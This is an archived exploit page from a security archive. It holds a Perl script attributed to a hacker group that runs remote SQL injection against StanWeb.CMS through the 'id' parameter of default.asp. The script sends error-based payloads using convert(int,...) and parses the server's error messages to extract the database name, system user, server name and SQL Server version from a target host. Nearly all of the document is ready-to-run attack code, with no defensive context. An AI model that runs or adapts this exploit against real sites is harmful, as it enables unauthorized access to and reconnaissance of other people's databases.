TUCoPS :: Web :: CMS / Portals :: bx3197.htm

StanWeb.CMS (default.asp id) Remote SQL Injection Exploit
StanWeb.CMS (default.asp id) Remote SQL Injection Exploit
StanWeb.CMS (default.asp id) Remote SQL Injection Exploit



# --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--=0D 
# --==+               StanWeb.CMS (default.asp id) Remote SQL Injection Exploit            +==--=0D
# --==+====================================================================================+==--=0D
#                      [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]=0D
=0D
# [+] Info:=0D
=0D
# [~] Software: StanWeb.CMS=0D
# [~] Exploit: Remote SQL Injection [High]=0D
# [~] Bug Found By: JosS | Jose Luis G=F3ngora Fern=E1ndez=0D
# [~] Contact: sys-project[at]hotmail.com=0D
# [~] Web: http://www.spanish-hackers.com=0D 
# [~] Vuln File: default.asp=0D
=0D
# [+] Exploit:=0D
=0D
#!/usr/bin/perl=0D
=0D
# StanWeb.CMS (default.asp id) Remote SQL Injection Exploit=0D
# Code by JosS=0D
# Contact: sys-project[at]hotmail.com=0D
# Spanish Hackers Team / EspSeC=0D
# www.spanish-hackers.com=0D 
=0D
# in memory of rgod :D=0D
=0D
use IO::Socket::INET;=0D
use LWP::UserAgent;=0D
use HTTP::Request;=0D
use LWP::Simple;=0D
=0D
sub lw=0D
{=0D
=0D
my $SO = $^O;=0D
my $linux = "";=0D
if (index(lc($SO),"win")!=-1){=0D
		   $linux="0";=0D
	    }else{=0D
		    $linux="1";=0D
	    }=0D
		if($linux){=0D
system("clear");=0D
}=0D
else{=0D
system("cls");=0D
system ("title StanWeb.CMS (default.asp id) Remote SQL Injection Exploit");=0D
system ("color 02");=0D
}=0D
=0D
}=0D
=0D
#*************************** expl ******************************=0D
=0D
=0D
&lw;=0D
=0D
print "\t\t########################################################\n\n";=0D
print "\t\t#       StanWeb.CMS - Remote SQL Injection Exploit     #\n\n";=0D
print "\t\t#                        by JosS                       #\n\n";=0D
print "\t\t########################################################\n\n";=0D
=0D
=0D
$host=$ARGV[0];=0D
chop $host;=0D
$host=$host."/default.asp?id=";=0D
=0D
if(!$ARGV[0]) {=0D
    print "\n[x] StanWeb.CMS - Remote SQL Injection Exploit\n";=0D
    print "[x] written by JosS - sys-project[at]hotmail.com\n";=0D
    print "[x] usage: perl $0 [host]\n";=0D
print "[x] example: http://hostxx.com/web\n";=0D 
    exit(1);=0D
 }=0D
=0D
@comando=("1+and+1=convert(int,db_name())","1+and+1=convert(int,system_user)","1+and+1=convert(int,\@\@servername)--",'1+and+1=convert(int,@@version)--');=0D
=0D
=0D
for ($i=0;$i<=3;$i++)=0D
=0D
{=0D
=0D
my $final = $host.$comando[$i];=0D
my $ua = LWP::UserAgent->new;=0D
my $req = HTTP::Request->new(GET => $final);=0D
$doc = $ua->request($req)->as_string;=0D
=0D
if ( $doc =~ /Syntax\s(.*)<\/font>/mosix )=0D
{=0D
=0D
if ($comando[$i] eq "1+and+1=convert(int,db_name())")=0D
{=0D
=0D
print "db_name:\n";=0D
=0D
$dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);=0D
print "$dbname\n\n";=0D
=0D
}=0D
=0D
if ($comando[$i] eq "1+and+1=convert(int,system_user)")=0D
=0D
{=0D
=0D
print "system_user:\n";=0D
=0D
$systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);=0D
print "$systemuser\n\n";=0D
=0D
}=0D
=0D
if ($comando[$i] eq "1+and+1=convert(int,\@\@servername)--")=0D
=0D
{=0D
=0D
print "servername:\n";=0D
=0D
$servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);=0D
print "$servername\n\n";=0D
=0D
}=0D
=0D
if ($comando[$i] eq '1+and+1=convert(int,@@version)--')=0D
=0D
{=0D
=0D
print "version:\n";=0D
=0D
$version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm);=0D
print "$version\n\n";=0D
=0D
}=0D
=0D
} # Cierre del if principal=0D
} # cierre for=0D
=0D
=0D
# --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--=0D 
# --==+                                       JosS                                         +==--=0D
# --==+====================================================================================+==--=0D
#             

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH